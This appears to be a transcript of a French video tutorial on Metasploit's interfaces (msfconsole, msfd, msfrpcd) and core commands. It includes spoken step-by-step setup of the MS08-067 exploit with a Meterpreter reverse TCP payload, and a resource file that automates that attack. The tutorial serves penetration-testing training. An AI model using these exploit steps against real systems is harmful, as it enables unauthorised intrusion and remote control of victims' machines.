Bonjour et bienvenue dans cette nouvelle vidéo consacrée au framework Metasploit, durant laquelle on va découvrir les différentes interfaces. La première interface qu'on va découvrir, donc c'est l'interface MSF Console, qu'on peut démarrer à l'aide de la commande tout simplement MSF Console. Alors MSF Console est l'interface la plus connue et la plus utilisée du framework Metasploit. En effet, il s'agit d'une interface interactive, simple d'utilisation et pourvue d'un système d'autocompilation. Toutes les options de Metasploit, telles que l'utilisation d'exploits et d'auxiliaires, la mise en place de listener, l'interaction avec la base de données ou encore le chargement de modules sont accessibles via cette interface. Tout au long de ces vidéos, nous allons décortiquer l'ensemble des fonctionnalités proposées par le framework Metasploit au travers de cette interface. Il sera alors possible de comprendre en détail l'ensemble des commandes utilisées pour, ou par exemple pour l'exploit ou exploiter la vulnérabilité de Microsoft MS 08.067. Je vous montre comment on le met en place. Donc on demande en général l'utilisation use un exploit. On peut tabuler bien sûr. Donc SMB à titre d'exemple, MS 08 underscore 067 net API, donc vulnérabilité d'exécution de code à distance. On initialise après on fait un set le remote host, donc rhost, en définissant donc l'adresse IP qui peut être par exemple 172.20.0.45. On définit le payload. Donc dans ce cas, par exemple, on va utiliser le payload qu'on a expliqué la fois passée ou dans les vidéos précédentes, Meterpreter Reversed TCP. On initialise le localhost à l'adresse IP de la machine qui peut être 192.168.192.151 par exemple. Et puis on lance l'exécution de l'exploit à travers la commande run. Donc les adresses IP renseignées ne sont pas des adresses IP correctes, bien sûr, ni la cible ni l'attaquant n'existent, mais c'était pour expliquer le déroulement de la mise en place d'un exploit. Donc, au sein de ces vidéos, nous allons découvrir, comme je le disais, les différentes interfaces. La deuxième interface, c'est l'interface MSFD, MSF Daemon, qui est un service permettant d'obtenir une interface MSF Console à distance, cette fois-ci par le biais d'un socket, c'est-à-dire une adresse IP accompagnée d'un port, donc socket TCP. En effet, MSFD permet d'ouvrir une interface réseau écoutant par défaut sur le port 55554. Donc MSFD, on peut regarder le help déjà, MSFD-H pour voir les différentes options. Et pour lancer cette interface, on peut taper la commande MSF tout simplement, MSFD. Vous remarquez que je suis dans l'invité de commande du système. Donc MSFD-A 0.0.0.0. Toutes les interfaces. Dès lors que le service est en écoute, un ou plusieurs utilisateurs sont à présent en mesure de se connecter à distance au framework. Cette fonctionnalité permet ainsi à plusieurs consultants de partager la même instance du framework sans obligatoirement posséder une installation de Metasploit en local sur leur machine. Donc dans un premier temps, il est nécessaire de lancer le daemon MSF sur la machine disposant du framework. C'est le cas, c'est ce qu'on va faire là tout de suite. Bien, si on veut regarder l'ensemble des processus en cours d'exécution et les services, netstate-point. Donc on voit que notre machine écoute sur le port
55 554, comme je l'ai dit précédemment. Et c'est un programme Ruby qui possède comme identifiant de processus 1302. À ce stade, on peut utiliser éventuellement une autre machine. Donc je prends une Debian, peu importe, je vérifie que ma carte elle est en NAT. Je vérifie aussi que la carte ici se trouve en NAT. Et donc je récupère l'adresse IP de notre machine Kali, 192.168.192.151. Pour pouvoir ouvrir une console à distance, il vous faut installer donc le paquet apt-install netcat, donc, qui est déjà installé pour mon cas, c'est pas le cas par défaut. Et puis taper la commande nc, l'adresse IP de la machine sur laquelle le framework est en mode d'exécution, c'est-à-dire la 192.168.192.151, port 55 554. Donc on voit qu'on a une session ouverte sur MSF console située sur la machine Kali Linux. Qu'est-ce qu'on peut dire néanmoins? Il convient de noter que même les frameworks d'exploitation de vulnérabilité peuvent eux-mêmes contenir des vulnérabilités. En effet, aucune authentification, comme on vient de le voir, n'est requise pour accéder à cette interface pourvu que celle-ci soit disponible sur le réseau. Ainsi, on peut voir aussi qu'il y a deux exploits qui ont été créés, MSF console. Deux exploits où on peut lancer un autre terminal. Deux exploits qu'on peut trouver. Donc back qu'on peut voir. Donc si on fait use exploit multi misc msfd et on tabule, on trouve donc le RCE remote et dans le multi-browser on trouve msfd RCE browser. L'utilisation d'outils offensifs n'empêche pas qu'un consultant puisse être une cible au cours d'un test d'intrusion par les équipes de défense. Il est nécessaire d'appliquer les pratiques de sécurité telles que l'utilisation d'un mot de passe robuste, l'utilisation de comptes sans privilège lorsque c'est possible, ainsi que le principe de la réduction de la surface d'attaque. De plus, les premières versions de MSFD n'intégraient pas le support SSL, donc Secure Socket Layer, afin de garantir la confidentialité ainsi que l'intégrité des données échangées. Cela est également possible, est maintenant possible plutôt, grâce à l'utilisation de l'option "-s", c'est-à-dire si on sort d'ici, donc on peut reprendre notre même commande, mais on enseigne "-s au lieu de "-a" pour sécuriser l'échange entre les deux machines. La console MSF RCP. Donc de la même manière que MSFD, MSF RPCD permet de gérer Metasploit à distance. En soi, il est également possible de l'utiliser de manière locale, mais l'intérêt est moins important. Ainsi, il devient possible d'effectuer des tâches de base telles que l'exécution de modules, l'accès à la base de données, l'interaction avec des sessions, l'export de données, etc. Contrairement à MSFD, MSF RPCD nécessite une authentification permettant de pallier l'exploitation de la vulnérabilité précédemment présentée. Metasploit est écrit en Ruby, néanmoins il est possible d'interroger cette API, application programme interface, avec n'importe quel langage de programmation. Plusieurs méthodes existent pour démarrer le serveur RPC pour appel RPC Remote Procedure Call ou appel de procédure à distance.
L'utilitaire MSF RPCD, on peut le lancer via l'utilitaire MSF RPCD lui-même dans le répertoire principal du Metasploit, c'est-à-dire on peut aller le voir dans USR share Metasploit framework. Donc si on fait un ls-l histoire de vérifier, on voit bien qu'on a MSF RPCD qui est présent ici. Donc on peut MSF RPCD regarder l'aide de ce dernier, les différentes options possibles. Et puis seule la spécification d'un identifiant ainsi que d'un mot de passe est nécessaire pour le lancement. Par défaut, MSF RPCD écoute sur l'ensemble des interfaces, c'est-à-dire 000, sur le port 55553. Donc pour le lancer, donc on fait appel à Ruby. MSF RPCD -u pour renseigner un utilisateur, -p pour renseigner éventuellement un password qui peut être dans mon cas password, mais bien sûr on doit mettre un mot de passe complexe, c'est juste pour expliquer. Et donc on voit que MSF RPCD se lance, écoute sur toutes les interfaces ou depuis toutes les interfaces, le port d'écoute c'est 55553 et il est en attente de connexion avec un PID 1524. On peut le faire aussi via le module MSG RPC au sein de Metasploit lui-même. Donc au niveau de la console MSF console. Il est également possible de lancer ce serveur RPC grâce au module présent, le module MSG RPC au sein de Metasploit. Ce module n'étant pas disponible par défaut, il est nécessaire de le charger au sein du framework. Le chargement-déchargement de modules sera abordé dans les prochaines vidéos. Donc on peut faire un load de MSG RPC. Je tabule pour vérifier. Donc on voit si aucune option n'est spécifiée, c'est le cas au niveau de mon exemple. Le serveur écoute sur l'adresse 127.0.0.1, l'adresse de la boucle locale, ainsi que sur le port 55552. Le nom d'utilisateur est MSF, le mot de passe est généré aléatoirement et le chiffrement SSL des communications n'est pas actif. On n'a pas d'option qui nous dit que le SSL est actif. Pour modifier ces valeurs par défaut, il est nécessaire de passer en argument lors du chargement du module l'ensemble des paramètres. Donc on aurait pu faire load msgrpc avec server host égale donc 0.0.0 pour toutes les adresses, server port pour renseigner un port spécifique, par exemple 3434, et user qui peut être user, pass pour définir entre cotes le mot de passe, par exemple password. Et si on veut activer SSL, il suffit de mettre SSL true. La documentation relative plutôt à l'API RPC du framework Metasploit est particulièrement complète sur le site RapidSed, site qu'on a découvert dans les premières vidéos. Dès lors, il est possible de se connecter au serveur distant grâce à l'utilitaire MSF RPC. Donc on peut vérifier l'écoute, donc si on met netstat pareil, -point, on voit que notre machine écoute sur le port 3434 qu'on a défini au niveau de comme argument au niveau du chargement
de la console MSG RPC. Bien, on a fait le tour. On va parler des fichiers de ressources qu'on a l'habitude aussi de mettre en place pour charger un ensemble de commandes. Dans le cas où l'exploit demanderait de nombreux paramètres pour s'exécuter, l'utilitaire ou l'utilisation de l'option ou des options de MSF Console peut s'avérer difficile. Il est alors possible d'utiliser des ressources externes, c'est-à-dire un élément ou des éléments ou des commandes qu'on met dans des fichiers. Les ressources peuvent permettre l'exploitation d'une ou plusieurs vulnérabilités. Il est en effet possible de les utiliser afin de mettre en place des scénarios d'attaque relativement complets. Les ressources peuvent être chargées de deux manières. La première s'utilise une fois MSF console lancée grâce à la commande ressources et on renseigne le nom du fichier. Donc le nom du fichier dans lequel on a tapé nos commandes, qui peut être un .rc ou peu importe. La seconde, plus simple, pour les réalisations des scripts, s'exécute grâce à l'option -r. Donc, par exemple, donc là, on peut générer un fichier ressources.rc dans lequel je vais mettre use exploit Windows SMB MS08 underscore 067 net API. On peut mettre set remote host, l'adresse IP 172 par exemple 54.045. Set payload Windows Meter reverse TCP. Set lhost localhost par exemple 192.168.192.151. Je l'enregistre. Et on peut donc faire appel à ce fichier en lançant la console MSF console-r ressources.rc. Donc la console se charge et exécute au même temps notre fichier de ressources. De la même manière que précédemment, l'ensemble des directives donc s'exécute à la suite allant du choix de l'exploit, c'est-à-dire notre use, exploit Windows SMB MS0867 net API, à l'exécution de ce dernier si on avait mis run à l'intérieur du fichier en passant par le choix de la charge utile, c'est-à-dire le set payload. Sinon, on peut le faire directement au niveau de, comme je l'ai dit, au niveau de notre console en faisant appel à la commande console et le fichier concerné, c'est-à-dire ressources.rc. Bien sûr, il va falloir l'enregistrer dans le dossier spécifique de Metasploit dans ce cas. On va faire un rappel aussi sur les commandes. Les commandes fréquemment utilisées, donc au niveau de la console. La commande help, première commande importante. Le but de cette section ou de cette partie n'est pas de faire une revue complète de l'ensemble des commandes de base de Metasploit. En effet, il en existe un peu plus d'une soixantaine et certaines seront abordées au fur et à mesure dans les vidéos. La commande la plus importante, moi je pense, c'est la commande help, qui est un bon début pour en savoir plus sur les commandes disponibles. Donc la commande help qui renvoie une panoplie d'explications concernant le framework Metasploit. La commande connect correspond à un mini netcat qu'on a vu de l'autre côté, embarqué au sein de Metasploit. Cela peut être utile dans le cadre de la récupération de bannières. Donc
connect, dans les pivots aussi sur le réseau, ou encore pour le téléchargement des fichiers. L'avantage par rapport à Netcat est le support de SSL permettant donc d'assurer, comme on le sait, la confidentialité ainsi que l'intégrité des données échangées. On peut voir son aide ou l'aide à travers donc de connect-h. La commande route. La commande route permet de router, hein, comme son nom l'indique, commande fréquemment utilisée sous les systèmes d'exploitation Linux, qui permet donc de router du trafic au sein d'une session établie. Donc route, on peut voir son LED plutôt, hein, donc avec le "-h. Les commandes load et unload, donc la commande load qui permettent respectivement, hein, donc de charger et de décharger des modules externes, donc load. Ces modules externes peuvent être listés grâce à la commande load-l pour lister, ou via le listing du répertoire qu'on a vu précédemment, qui se trouve dans Metasploit Framework Plugins. On y trouve par exemple les modules tels que Nessus, Nexpose ou encore SQLmap, etc. À la suite de la compromission d'une machine, il est possible aussi d'obtenir une session interactive avec cette dernière, que cela soit un shell standard, une session VNC, Virtual Network Computer, ou bien une session Metalpreter. Il est alors possible d'interagir avec cette machine grâce à la commande session. Donc, session reviendra en détail, mais on peut regarder l'aide de cette commande fréquemment utilisée. Grâce à cette commande, il est ainsi possible d'interagir simultanément avec l'ensemble des systèmes compromis, d'exécuter des scripts, etc. Nous reviendrons sur l'utilisation avancée des sessions dans les vidéos suivantes. La commande set, qu'on a eu l'occasion de voir, fait partie des commandes régulièrement utilisées. Elle permet de définir une valeur ou affecter une valeur pour une option. Cette commande est utilisée dans chaque module afin de déterminer les paramètres tels que l'adresse IP, le port, etc. Donc comme on l'a vu, set rhost, remote host, par exemple 192, 168, 192, 151. Comme on peut l'affecter ou l'utiliser pour l'affectation pour une adresse réseau, par exemple /24 avec le paramètre rhosts. De manière similaire, la commande setg permet de définir les valeurs des variables de manière globale. En effet, dans le cadre de l'utilisation de la commande set, il reste nécessaire de redéfinir les valeurs rhosts dans le cas précédent pour chaque module. Donc, si on veut que tous les modules qu'on veut utiliser prennent en charge cette déclaration ou cette affectation, on utilise setg rhosts. Comme ça, cette déclaration sera prise en charge par tous les modules qu'on va utiliser. C'est ce qu'on appelle une déclaration globale. Donc si on fait set, on voit global r hosts 192, 168, 192.0/24. Le redémarrage de Metasploit ne permet pas de garder les informations en mémoire. Pour pallier ce problème, la commande save existe. Cette commande va enregistrer les données au sein d'un fichier de configuration qui sera pris en compte au redémarrage. Donc on peut utiliser la commande éventuellement save, save qui stocke donc la configuration dans le fichier comme on le voit, hein, donc le chemin root msf4 config. On peut faire un cat de ce dernier si on veut. Root h.ms, pardon. Voilà, donc les éléments stockés au niveau de ce fichier, le rhosts qu'on a tapé précédemment. Les commandes liées au module, afin d'afficher l'ensemble des modules présents au sein du framework Metasploit, il est possible d'utiliser la commande show, tout simplement. Show exploit par exemple.
pour afficher les exploits. On peut faire un help sur show, on peut afficher les plugins, on peut faire des recherches, on peut faire un help sur search par exemple, ou utiliser directement la commande search, l'utilisation des mots-clés, ainsi que l'option -S permettant de filtrer encore davantage les modules renvoyés par la commande search. Pour obtenir l'ensemble des informations sur un module spécifique, il est possible d'utiliser la commande info. Donc si on fait info par exemple exploit multi browser Firefox escape red valeur. Donc on peut lire le descriptif de l'exploit, regarder et lire les informations possibles, les paramètres qu'il faut initialiser. Afin d'obtenir l'ensemble des options possibles pour les modules, il est possible d'utiliser options. Donc je reviens sur le même. Donc quelles sont les options qu'il va falloir définir? Option avec S, pardon. Il faut définir le SRV host, SRV port, le SSL cert, le certificat, etc. Pour avoir des informations détaillées, on peut utiliser Advanced. Donc permettant d'avoir plus de détails. Donc on voit qu'on a plus d'options. Une fois en général le module adéquat identifié, il devient alors nécessaire de le sélectionner au sein du framework, donc à travers la commande use, comme on l'a vu tout à l'heure, par exemple use auxiliary scanner FTP Anonymous. Ainsi, la stratégie à adopter est donc de chercher le module à utiliser grâce à la commande search. Donc, puis d'utiliser ce dernier. Donc à partir du moment où on trouve le module avec search, on fait, donc en général on tape search pour chercher le module, puis use pour l'utiliser. Ce processus peut paraître un peu contraignant, dans le cas où la recherche est précise et ne renvoie qu'un seul résultat. Dans ce cas, il est possible d'utiliser la commande search avec un -U. Cette commande utilise automatiquement le premier module qui match avec la recherche. Par exemple, si on fait un use-u CVE 2013 0422 use, pardon, search. Pourquoi j'ai mis use? On va y arriver. Voilà. Que cela soit fait de manière automatique ou manuelle. Une fois au sein du module, il est possible d'afficher les options de ce dernier grâce à la commande show options, comme ici. Donc on est dans le module multi-browser. Donc si on fait show options, ça nous permet de voir aussi les options qu'on devrait éventuellement configurer. Show advanced, pareil. Donc ça permettra de voir les options plus en détail. Et donc comme vous l'avez vu depuis tout à l'heure, pour revenir ou remonter dans l'arborescence, on utilise le back, la commande back. Les vulnérabilités évoluent aussi au fur et à mesure. Il est possible d'éditer simplement un module grâce à la commande edit. Donc si je reviens dans mon use, rien ne nous empêche de faire un petit edit pour voir le contenu de ce qui a été écrit concernant ce module. Le framework Metasploit étant il a été développé, comme on l'avait dit, en Ruby. Il est à tout moment possible d'obtenir un interpréteur Ruby grâce à la commande IRB aussi.
Ces modules, on peut les enrichir, les modifier, et puis enfin, lorsque l'ensemble des options est valide, il est possible de lancer le module grâce à la commande exploit ou la commande run, comme on l'a vu tout au début. Exploit étant, si vous voulez, un alias de la commande run. On va s'arrêter au niveau de cette partie. Merci pour votre attention, votre écoute.